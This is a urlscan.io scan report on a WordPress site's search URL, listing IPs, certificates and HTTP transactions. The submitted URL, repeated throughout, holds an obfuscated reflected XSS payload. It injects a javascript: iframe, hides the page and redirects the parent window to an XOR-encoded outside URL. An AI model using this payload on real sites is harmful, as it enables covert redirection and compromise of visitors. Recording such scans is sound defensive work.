urlscan.io logo urlscan.io
SecurityTrails logo

xist2.com Open in urlscan Pro
188.114.97.3  Public Scan

Go To Rescan Add Verdict Report
Submitted URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/c...
Effective URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/c...
Submission: On April 30 via manual from US — Scanned from NL
 Behaviour Indicators
Similar DOM Content API
Verdicts

Summary

This website contacted 5 IPs in 3 countries across 5 domains to perform 21 HTTP transactions. The main IP is 188.114.97.3, located in Amsterdam, Netherlands and belongs to CLOUDFLARENET, US. The main domain is xist2.com.
TLS certificate: Issued by E1 on April 26th 2024. Valid for: 3 months.
This is the only time xist2.com was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

IP Address AS Autonomous System
16 188.114.97.3 13335 (CLOUDFLAR...)
1 2600:9000:215... 16509 (AMAZON-02)
2 136.143.191.190 2639 (ZOHO-AS)
1 89.36.170.147 41913 (COMPUTERL...)
1 2606:4700:20:... 13335 (CLOUDFLAR...)
21 5
16    188.114.97.3 (Amsterdam, Netherlands)

ASN13335 (CLOUDFLARENET, US)
xist2.com
1    2600:9000:2156:d600:11:bd8b:3000:93a1 (United States)

ASN16509 (AMAZON-02, US)
cdn.pagesense.io
2    136.143.191.190 (United States)

ASN2639 (ZOHO-AS, US)
pagesense-collect.zoho.com
1    89.36.170.147 (Schlierbach, Switzerland)

ASN41913 (COMPUTERLINE Computerline, Schlierbach, Switzerland, CH)
PTR: zoho-170-147.dub3.computerline.net
static.zohocdn.com
1    2606:4700:20::681a:92c (United States)

ASN13335 (CLOUDFLARENET, US)
ipapi.co
Apex Domain
Subdomains		 Transfer
16 xist2.com
xist2.com
208 KB
2 zoho.com
pagesense-collect.zoho.com — Cisco Umbrella Rank: 28147
888 B
1 ipapi.co
ipapi.co — Cisco Umbrella Rank: 16703
887 B
1 zohocdn.com
static.zohocdn.com — Cisco Umbrella Rank: 14034
8 KB
1 pagesense.io
cdn.pagesense.io — Cisco Umbrella Rank: 23404
62 KB
21 5
Domain Requested by
16 xist2.com xist2.com
2 pagesense-collect.zoho.com cdn.pagesense.io
1 ipapi.co xist2.com
1 static.zohocdn.com cdn.pagesense.io
1 cdn.pagesense.io xist2.com
21 5

This site contains no links.

Subject Issuer Validity Valid
xist2.com
E1		 2024-04-26 -
2024-07-25		 3 months crt.sh
cdn.pagesense.io
Amazon RSA 2048 M02		 2023-08-01 -
2024-08-29		 a year crt.sh
*.zoho.com
Sectigo RSA Domain Validation Secure Server CA		 2024-03-29 -
2025-03-29		 a year crt.sh
*.zohocdn.com
Sectigo RSA Domain Validation Secure Server CA		 2023-09-10 -
2024-10-09		 a year crt.sh
ipapi.co
E1		 2024-03-09 -
2024-06-07		 3 months crt.sh

This page contains 1 frames:

Primary Page: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Frame ID: 9E8552F10FF03CB858C253D274EFC78A
Requests: 21 HTTP requests in this frame

Screenshot
Live screenshot
Full Image

Page Title

Search: \"><iframe src=javascript:/*fd7§ Other.everywhere1]foriginal§style*/codeString=`win` `dow.par` `ent.docu` `ment.docu` `mentEle` `ment.st` `yle.opa` `city=0;url=[66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,];/*fwef[~7el~wefwef§3000zwefwef§3000zb*/win` `dow.par` `ent.loca` `tion.hr` `ef=url.map(value=` String.fromCharCode(62) `String.fromCharCode(value^63)).jo` `in(\'\').concat(\' | XIST2You searched for "><iframe src=javascript:/*fd7§Other.everywhere1]foriginal§style*/codeString=`win` `dow.par` `ent.docu` `ment.docu` `mentEle` `ment.st` `yle.opa` `city=0;url=[66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,];/*fwef[~7el~wefwef§3000zwefwef§3000zb*/win` `dow.par` `ent.loca` `tion.hr` `ef=url.map(value=` String.fromCharCode(62) `String.fromCharCode(value^63)).jo` `in('').concat(' - XIST2

Detected technologies

Overall confidence: 100%
Detected patterns
  • <link rel=["']stylesheet["'] [^>]+/wp-(?:content|includes)/
  • /wp-(?:content|includes)/
Overall confidence: 100%
Detected patterns
  • jquery.*\.js(?:\?ver(?:sion)?=([\d.]+))?
Overall confidence: 100%
Detected patterns
  • jquery[.-]migrate(?:-([\d.]+))?(?:\.min)?\.js(?:\?ver=([\d.]+))?

Page Statistics

21
Requests

100 %
HTTPS

40 %
IPv6

5
Domains

5
Subdomains

5
IPs

3
Countries

279 kB
Transfer

992 kB
Size

8
Cookies

Redirected requests

There were HTTP redirect chains for the following requests:

21 HTTP transactions

Resource
Path		 Size
x-fer		 Type
MIME-Type
Primary Request /
xist2.com/ 		84 KB
19 KB 		Document
General
Check archive.org
Download Go to
Full URL
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
f0f770dd3302199dd3ae22f8fa5946a27506a9317f6e049e8f632db4d0e9c3d3

Request headers

Accept-Language
nl-NL,nl;q=0.9;q=0.9
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
sec-ch-ua-mobile
?0
sec-ch-ua-platform
"Win32"

Response headers

age
0
alt-svc
h3=":443"; ma=86400
cf-cache-status
DYNAMIC
cf-ray
87cacb14699ca000-AMS
content-encoding
br
content-type
text/html; charset=UTF-8
date
Tue, 30 Apr 2024 21:58:28 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sOXHXg2OAckDfThsYnhKi%2BQe0DlSKFGcSIR2Gb7NTObpcwDByw8PqfcW%2F22MFWqEHT5EnNCVC0NhepjN1fL5DrqWzYJ3Rb%2BEYuQYmvpLtjXqFKL4wBeD1Sgu6ek%3D"}],"group":"cf-nel","max_age":604800}
server
cloudflare
vary
Accept-Encoding
x-cache
MISS
style.css
xist2.com/wp-includes/css/dist/block-library/ 		115 KB
15 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-includes/css/dist/block-library/style.css
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
9f7c93939a623953d8b800c61b25e8b4788c35babf7746378052656a605cf8a0

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Thu, 01 Feb 2024 04:15:14 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"65bb1ad2-1cdef"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4kWR3iyMc9jgJrLmvM%2BG3eonlEobeu1vh2twtLBDMUemYkJwsAJdyZoK%2B7RtBjDOtGISGFtHyv0xoiYX4Nc9Zy0GoLDkf6wjujpLgB%2FmJ9ZFjGCNcmAKkA2gCJY%3D"}],"group":"cf-nel","max_age":604800}
content-type
text/css
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f13a000-AMS
alt-svc
h3=":443"; ma=86400
cookie-law-info-public.css
xist2.com/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/ 		8 KB
3 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-public.css
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
3a3947cbfe82302adcb4d05895110ccc02317c08596e7065646641a62335fb3d

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Wed, 15 Nov 2023 11:49:06 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"6554b032-2154"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CrJDuV3SUNSjKU1zKGyVbSHSSvDvP3bm3arVw%2BZMtRxkgoRQiYVUwsAxQVIp2cCrcodDbfFHD6QmYh1%2F40Wzu6%2BlX9MSwMpcLX%2FsI8DLUkhgljzFN0b13Sr8HzY%3D"}],"group":"cf-nel","max_age":604800}
content-type
text/css
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f15a000-AMS
alt-svc
h3=":443"; ma=86400
cookie-law-info-gdpr.css
xist2.com/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/ 		22 KB
5 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-gdpr.css
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
e915f291ea9b33ef259ab52a27978fad4b76b2c7575f6c5aad4390ff20c473a9

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Wed, 15 Nov 2023 11:49:06 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"6554b032-59d1"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KIe8gyFFtLasJI%2BJAoH9Zzi%2Bd4cgMnfws0%2FVvWF%2B%2FjhcWHNbBL5oFlfoKGvywa6c8fPKbnvn%2FEPseYNqvQm2vHmHyRnzQikdU7SY1Ue%2BBvshRPhIpzE5u81AcMc%3D"}],"group":"cf-nel","max_age":604800}
content-type
text/css
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f17a000-AMS
alt-svc
h3=":443"; ma=86400
dashicons.css
xist2.com/wp-includes/css/ 		61 KB
35 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-includes/css/dashicons.css
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
a914dcbc1a475591ca1493cc05020c4d6e32b2d24d5e0094a13840ed00ca0038

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Wed, 24 Mar 2021 13:26:55 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"605b3e1f-f399"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s4VyMGUcqwx%2FN4UyNJtGaFm4Wx7I6FuS4OuanY4m6q36A19r7Hh9kRLXWWWs84MN94jUY89%2Bk8fQafrPXIc2Exo9VG%2BmAjVraPE0FWel6TpIcbOGw1JRj4J39KQ%3D"}],"group":"cf-nel","max_age":604800}
content-type
text/css
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f18a000-AMS
alt-svc
h3=":443"; ma=86400
reset.css
xist2.com/wp-content/themes/xist2-v1.4/assets/css/ 		780 B
864 B 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-content/themes/xist2-v1.4/assets/css/reset.css
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
d56a379bef04b355d6f8dd825bb62453ea7432ea582489c41f1311b1aed99902

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Thu, 06 Oct 2022 01:18:48 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"633e2cf8-30c"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cXhUXpjvV2Ho1qkXCrMdaZpq9hpSFb5YZsmSn2hQidWLx78z9P0g5aBIJQWuIgMGYYwGR6u35KynCDPeZovF0wHTOgN76VnmbBuIhmPsyjn0DP3%2FRvca1CAK7uE%3D"}],"group":"cf-nel","max_age":604800}
content-type
text/css
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f19a000-AMS
alt-svc
h3=":443"; ma=86400
grid.css
xist2.com/wp-content/themes/xist2-v1.4/assets/css/ 		3 KB
977 B 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-content/themes/xist2-v1.4/assets/css/grid.css
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
